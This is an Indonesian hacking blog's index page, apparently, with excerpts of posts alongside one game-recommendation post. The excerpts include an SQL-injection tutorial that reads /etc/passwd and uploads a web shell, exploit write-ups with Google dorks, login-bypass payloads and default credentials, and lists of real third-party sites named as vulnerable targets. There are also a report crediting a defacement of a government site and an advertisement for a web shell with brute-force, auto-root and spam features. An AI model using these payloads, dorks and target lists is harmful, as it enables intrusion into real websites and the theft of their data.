Langsung ke konten utama

Postingan

Pinned Post

Rekomendasi Game Simulator Kendaraan 2020 yang Tak Kalah Seru dari Sebelumnya

Sekarang, banyak sekali jenis game online bertebaran. Mulai MMORPG sampai dengan Game Simulation atau yang lebih familiar dikenal game simulator. Belakangan yang banyak dimainkan adalah game simulator yang menawarkan pengalaman melakukan aktivitas dengan simulasi. Ada yang life-simulation games, vehicle simulation, dan masih banyak lagi lainnya. Tahun 2020 ini juga banyak bermunculan game simulator yang tidak kalah seru dari sebelum-sebelumnya. Bagi yang sedang mencari rekomendasi, berikut ini akan adalah daftar game simulator patut dicoba yang pertama, Bus Simulator Indonesia Pertama datang dari Tanah Air ada yang namanya Bus Simulator Indonesia atau biasa disingkat BUSSID. Game ini cocok sekali bagi yang ingin merasakan sensasi supir bus Indonesia apalagi bila menginstall mod yang didapat dari anonytun.com, di sana Anda bisa mendapatkan banyak pilihan bus, truk dan mobil yang seru secara gratis. A da simulasi bus antarkota, antarprovinsi,  bahkan antar pulau. Karena ada fi...
Posting Komentar
Baca selengkapnya

Upload Shell With SQL Injection ( SQL Into OUTFILE)

Upload Shell With SQL Injection ( SQL Injection Into OUTFILE) SQL Injection Into OUTFILE Upload shell tanpa mencari login admin... sempat" menulis lagi di blog hehehe dari pada bosen gak ngapain" mending buat tutor ... sudah jarang masuk di dunia hacking karena sibuk di dunia nyata... tapi insyaallah saya akan sempat share tutor ... *Pastikan kalian sudah mengerti deface sql manual kalo belum lihat post sebelumnya Deface SQL Manual ohh ya jika kalian butuh tools" kunjungin juga blog pencari receh :'v  404Hacking TOols  kali ini saya pakai bts pentesting lab, karena males cari live target  pastikan kalian sudah di posisi seperti ini lalu di angka 3 ganti dengan load_file('/etc/passwd') , localhost:8080/btslab/vulnerability/ForumPosts.php?id=-1 union select 1,2,load_file('/etc/passwd'),4--+ HEX : load_file(0x2f6574632f706173737764) jika tidak keluar isi dalam perutnya skip aja bro tapi kalau mau tahu isi usernya bisa lihat di target,com/phpinfo.php ka...
Posting Komentar
Baca selengkapnya

Pusat Pengembagan Pendidikan Anak Usia Dini dan Pendidikan Masyarakat Jawa Barat Disusupi Hacker

Kasus Peretasan kembali terjadi ditanah air tercinta ini , kali ini yang menjadi korban adalah situs Pusat Pengembagan Pendidikan Anak Usia Dini dan Pendidikan Masyarakat Jawa Barat , akan tetapi peretas ini tidak merusak halaman depan website, hanya sekedar meneitipkan file sejarah.php berikut link website yang diretas :  http://pauddikmasjabar.kemdikbud.go.id/sejarah.php berikut pesan yang ditinggalkan oleh pelaku : KALO BEGO BEGO AJA JANGAN SALAHIN MICIN NYA! Indonesian Code Party $ ZeynnymouZ - ./BlaDDzeRR - UnknownYmouZ - -DenJaka- - Consept_IXI - ./Coco - 0x1999 - Lock-Down - ./UnIX - ./L1ght_R00t $ - Walkers404 - ./PionHitam - Mr.Vendetta_404 - gunz_berry - D4N13L - Et04 - Mr.Rchi - Aris Dot ID - 0x1958 - bL@cKID -  pelaku juga meninggalkan email : zyystem@gmail.com  semoga admin mengetahui dan segera mempatch bug diwebsitenya  anda juga bisa melihat miror nya disini: http://www.zone-h.org/mirror/id/30478164 Selamat malam, dan selamat tidur ( x404.hx/BE )...
Posting Komentar
Baca selengkapnya

WordPress Plugin Userpro < 4.9.17.1 Authentication Bypass

# Exploit Title: Userpro – WordPress Plugin – Authentication Bypass # Google Dork: inurl:/plugins/userpro # Date: 11.04.2017 # Exploit Author: Colette Chamberland (Wordfence), Iain Hadgraft (Duke University) # Vendor Homepage: https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681?s_rank=9 # Software Link: https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681?s_rank=9 # Version: <= 4.6.17 # Tested on: Wordpress 4.8.3 # CVE : requested, not assigned yet. Description ================================================================================ The userpro plugin has the ability to bypass login authentication for the user 'admin'. If the site does not use the standard username 'admin' it is not affected. PoC ================================================================================ 1 - Google Dork inurl:/plugins/userpro 2 - Browse to a site that has the userpro plugin installed. 3 - Append ?up_auto_log=true to the targ...
Posting Komentar
Baca selengkapnya

Web File Manager - Arbitrary File Upload

# Exploit Title : Web File Manager - Arbitrary File Upload # Date : 06/11/017 # Exploit Author: Misterklio # Tested on : Windows 7 # Contact : www.fb.com/izzadiine //////////////////////  Dorks ////////////////////// 1) Search target with Google Dorking # intext:"Web File Manager" site:co.il ////////////////////// Admin Panel ////////////////////// 2) Poc : target.com:8000/Login ////////////////////// File To Upload ////////////////////// 3) Test : http://dyes.co.il:8000/Login ////////////////////// Default pw and user ////////////////////// User : web Password : 1
Posting Komentar
Baca selengkapnya

WordPress Plugins ImageManager- Arbitrary File Upload

# Exploit Title: WordPress Plugins ImageManager- Arbitrary File Upload # Date: 04/11/017 # Exploit Author: j!h4dDZ # Tested on: Windows 7  ============================================================================ 1)Search target with Google Dorking inurl:wp-content/plugins/ImageManager/manager.php Index of wp-content/plugins/ImageManager/manager.php 2)Exploit the websites File Upload (PoC)  http://localhost/wp-content/plugins/ImageManager/manager.php http://www.lesnap.com/wp-content/plugins/ImageManager/manager.php http://www.magicrelationship.net/blog/wp-content/plugins/ImageManager/manager.php http://www.trejosolutions.com/blog/wp-content/plugins/ImageManager/manager.php 3) Location File: http://localhost/wp-content/uploads/.thumbs/.FILE.jpg
Posting Komentar
Baca selengkapnya

Comfort Technical Assistance AdminPage ByPass

# Exploit Title: Comfort Technical Assistance AdminPage ByPass # Date: [2017-11-08] # Google Dork: intext:Site Design by Comfort Technical Assistance, LLC. # Exploit Author: Revenge Team =>Reza Li # Vendor Homepage: [http://www.comfortechassist.com/] # Software Link: [-] # Version: All Version # Tested on: [windows 8 & windows 10] # DISCRIPTION: Search dork and select Target # Example : http://site.com/admin/ # # Enter Username and Password : '=' 'OR' # # Username : '=' 'OR' # PassWord : '=' 'OR  # Demo: # http://www.whaleycomm.com/admin/
Posting Komentar
Baca selengkapnya

Gabutz Shell V3

Rilis Gabutz Shell V3 what it's new ? -spawn anon(anonghost shell) -localroot (auto root with perl) -joomla brute force -spawn uploader with txt -spawn noname -lokomedia + auto login + upload shell -balitbang 3.5.3 (beta) -cms popoji add admin -sql scanner vulnerability -streaming nekopoi -streaming brazzer -port scanner -wordpress brute force -wp auto hijack -encode/decode -Mail Spam -zip menu -full bypass -bypass vhost -bypass disable functions -shell finder -auto edit title wordpress -Injection C0de -domain viewer -joomla brute force -about me -contact me -music fiture ============================================= ** COMMAND BASED ***  - Read File  usage: rf [filename]  example: rf /etc/passwd  - Spawn File/Tools  usage: spawn [name]  [name] - Adminer (adminer)  - WebConsole (webconsole)  - CGI Telnet 1 (cgitelnet1)  - CGI Telnet 2 (cgitelnet2)  - PHPINFO (phpinfo) -webdav(webdav) -adfin (admin finder) - elfinder (elfinder exploiter) ...
Posting Komentar
Baca selengkapnya